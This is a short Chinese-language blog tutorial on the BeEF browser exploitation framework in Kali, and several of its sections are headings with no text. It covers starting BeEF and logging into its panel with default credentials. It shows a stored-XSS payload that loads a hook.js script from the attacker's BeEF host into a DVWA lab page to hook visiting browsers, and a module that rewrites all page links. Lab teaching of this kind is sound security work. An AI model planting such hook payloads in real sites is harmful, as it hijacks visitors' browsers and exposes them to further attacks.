二十六、BEEF浏览器漏洞利用框架

2017-12-15  本文已影响0人  cybeyond
                                   目录
  1. 浏览器攻击面
  2. BEEF(Browser exploitation framework)
  3. 攻击手段
  4. 常见用途
  5. 启动beef
  6. 使用beef执行js
  7. beef模块
  8. 主要模块

1、浏览器攻击面

2、BEEF(Browser exploitation framework)

3、攻击手段

4、常见用途

5、启动beef

在kali最左侧栏可以直接看到启动图标,点击后直接启动


启动beef
启动beef

6、使用beef执行js

访问beef,输入http://192.168.50.115:3000/ui/panel(因为是在kali,可以输入127.0.0.1),用户名和密码均为beef

访问beef

下面可以通过beef已有的js脚本实施注入,通过xss stored进行测试

<script src="http://192.168.50.115:3000/hook.js"></script>
beef js测试

点击提交,执行后,在beef的管理界面可以看到hook到的客户端信息(包括使用kali和宿主机的浏览器分别访问dvwa的xss stored页面)

hook到的客户端信息

7、beef模块

在beef的command中,有多个模块,每一个模块下面有很多js能够下发给客户端,然后被客户端执行,模块也是分颜色的,每一种颜色代表一种使用场景


模块颜色

举例:修改页面中的链接,统一为http://www.baidu.com

修改href

执行后,点击页面中存在的链接,都会被指向到www.baidu.com

点击链接 链接到百度

8、主要模块

上一篇 下一篇

猜你喜欢

热点阅读